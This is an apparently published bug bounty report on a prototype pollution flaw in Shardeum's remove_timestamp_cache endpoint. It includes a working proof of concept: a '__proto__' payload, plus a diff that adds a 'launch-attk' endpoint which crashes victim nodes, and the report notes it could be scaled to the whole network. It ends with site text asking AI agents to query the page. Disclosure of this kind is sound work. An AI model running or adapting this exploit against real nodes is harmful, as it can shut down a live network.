# 34476 - \[BC - Critical] remove\_timestamp\_cache prototype pollution lead... Submitted on Aug 13th 2024 at 18:17:14 UTC by @ZhouWu for [Boost | Shardeum: Core](https://immunefi.com/bounty/shardeum-core-boost/) Report ID: #34476 Report type: Blockchain/DLT Report severity: Critical Target: Impacts: * Network not being able to confirm new transactions (total network shutdown) ## Description ## Description In the @shardus/core source code repo, node store a cache of transaction timstamp. Other node will ask the cache, if it's a miss the node will create new tx timestamp cache object derived from payload of the request. Subsequently there's another endpoint named remove\_timestamp\_cache , presumebly to remove these cache. This endpoint is referencing properties in object injection from the element in the payload from the request. Which make it vulnearble to prototype pollution ## Vulnerability This happen due to referencing the object properties from the payload of the request directly when trying to remove the cache in `remove_timestamp_cache` endpoint. The code is as follows ``` if (this.txTimestampCache[cycleCounter] && this.txTimestampCache[cycleCounter][txId]) { ``` This way of referencing the cache object to assigned value is dangerous, because the referenced element come straight from the request payload. Consider the following payload ``` { cycleMarker: "rndmStr", cycleCounter: "__proto__", txId: "hasOwnProperty" } ``` This mean that the cache object will be referenced in the following way ``` this.txTimestampCache["__proto__"]["hasOwnProperty"] ``` Essentially overwriting the prototype of the cache object, and the `hasOwnProperty` method of the cache object. This is problematic because `hasOwnProperty` is polluted to be a literal string which in turns break the code of the victim when object iteration or objection check operations are done later down the stream. ## Proof of Concept * Launch a network of legit nodes. * Launch an attacker node with this patch applied to shardus/core * Wait for the attacker node to go active ```diff diff --git a/src/utils/nestedCounters.ts b/src/utils/nestedCounters.ts index 3ebbb782..5fbe9796 100644 --- a/src/utils/nestedCounters.ts +++ b/src/utils/nestedCounters.ts @@ -5,6 +5,11 @@ import Crypto from '../crypto' import { isDebugModeMiddleware, isDebugModeMiddlewareLow } from '../network/debugMiddleware' import { getNetworkTimeOffset, shardusGetTime } from '../network' import { Utils } from '@shardus/types' +import { InternalRouteEnum } from '../types/enum/InternalRouteEnum' +import { getTxTimestampReq, serializeGetTxTimestampReq } from '../types/GetTxTimestampReq' +import { deserializeGetTxTimestampResp, getTxTimestampResp } from '../types/GetTxTimestampResp' +import * as crypto from "crypto" + type CounterMap = Map interface CounterNode { @@ -32,6 +37,30 @@ class NestedCounters { } registerEndpoints(): void { + + Context.network.registerExternalGet('launch-attk', async (req, res)=>{ + + const victim = req.query.victim as string + + const node = Context.shardus.getNodeByPubKey(victim) + + const cycleMarker = crypto.randomBytes(254).toString() + + const cycleCounter = "__proto__" + + const txId = "hashOwnProperty" + + const payload = { + cycleMarker, + cycleCounter, + txId + } + + const data = await Context.p2p.ask(node, "remove_timestamp_cache", payload, false) + + res.send(data) + }) + Context.network.registerExternalGet('counts', isDebugModeMiddlewareLow, (req, res) => { profilerInstance.scopedProfileSectionStart('counts') ``` * Send a request to the attacker node with the victim node pubkey as a query parameter * `GET http://localhost:1337/launch-attk?victim=` * observe the logs, the node exit unCleanly, essentially killing the node. ## Impact This is pretty straightforward single node attack, the script can be modified to attack the whole network to kill the whole network. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/shardeum-core/34476-bc-critical-remove_timestamp_cache-prototype-pollution-lead....md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.